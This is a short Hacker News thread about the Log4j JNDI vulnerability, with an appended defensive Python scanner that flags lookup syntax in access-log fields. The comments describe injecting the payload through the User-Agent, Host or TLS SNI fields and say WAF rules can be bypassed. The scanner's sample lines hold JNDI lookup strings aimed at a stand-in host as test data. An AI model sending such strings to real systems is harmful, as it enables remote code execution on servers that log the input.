Hacker News
by jbourne 1652 days ago
Yes, this is still possible if you log any user-modifiable value. One example would be logging out a user agent header - if an attacker spoofs this to include a JNDI URI then the vulnerability can be exploited.

This is why this CVE is so scary - I would imagine the majority of applications using log4j will log out a user-supplied value at some point.

1 comment

How about feeding the magic string via Host header in your requests and then cutting off? You wouldn't even need to establish the full TLS handshake, SNI is sent in the clear, and you would get to hit every single load-balancer and middle box - and everything they send their logs to.

Oh, and WAF rules won't protect you either: https://twitter.com/Rezn0k/status/1469523006015750146
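A defender-side check for the case discussed in this thread, added here as an example and not part of the original comments: it scans access-log lines for Log4j lookup syntax in client-controlled fields (request line, Referer, User-Agent). The Combined Log Format, the function names and the sample lines are assumptions constructed for illustration; any `${` is flagged, not only the literal `${jndi:` prefix, because Log4j lookups can be nested.

```python
import re
from urllib.parse import unquote

# Assumed format: Combined Log Format
# ip - user [time] "request" status bytes "referer" "user-agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "(?P<user_agent>[^"]*)"$'
)

def classify(value):
    """Return 'jndi-lookup', 'lookup-syntax' or None for one client-controlled value."""
    decoded = value
    for _ in range(3):  # undo up to three layers of percent-encoding
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    lowered = decoded.lower()
    if "${jndi:" in lowered:
        return "jndi-lookup"
    if "${" in lowered:  # any other lookup syntax is still worth a look
        return "lookup-syntax"
    return None

def scan(lines):
    """Return (line_number, field, verdict) for every flagged client-controlled field."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = LINE_RE.match(line)
        if not match:
            continue  # line is not in the assumed format
        for field in ("request", "referer", "user_agent"):
            verdict = classify(match.group(field))
            if verdict:
                findings.append((number, field, verdict))
    return findings

# Constructed sample lines (not real traffic); hosts use reserved example names.
SAMPLE = [
    '203.0.113.5 - - [10/Dec/2021:10:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://host.example/a}"',
    '203.0.113.9 - - [10/Dec/2021:10:00:02 +0000] "GET /?q=%24%7BJNDI%3Aldap%3A%2F%2Fhost.example%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.7 - - [10/Dec/2021:10:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${date:yyyy}"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A hit in these logs shows that the string reached a logging component, not that the component was vulnerable; correlate with the Log4j version in use behind each log source.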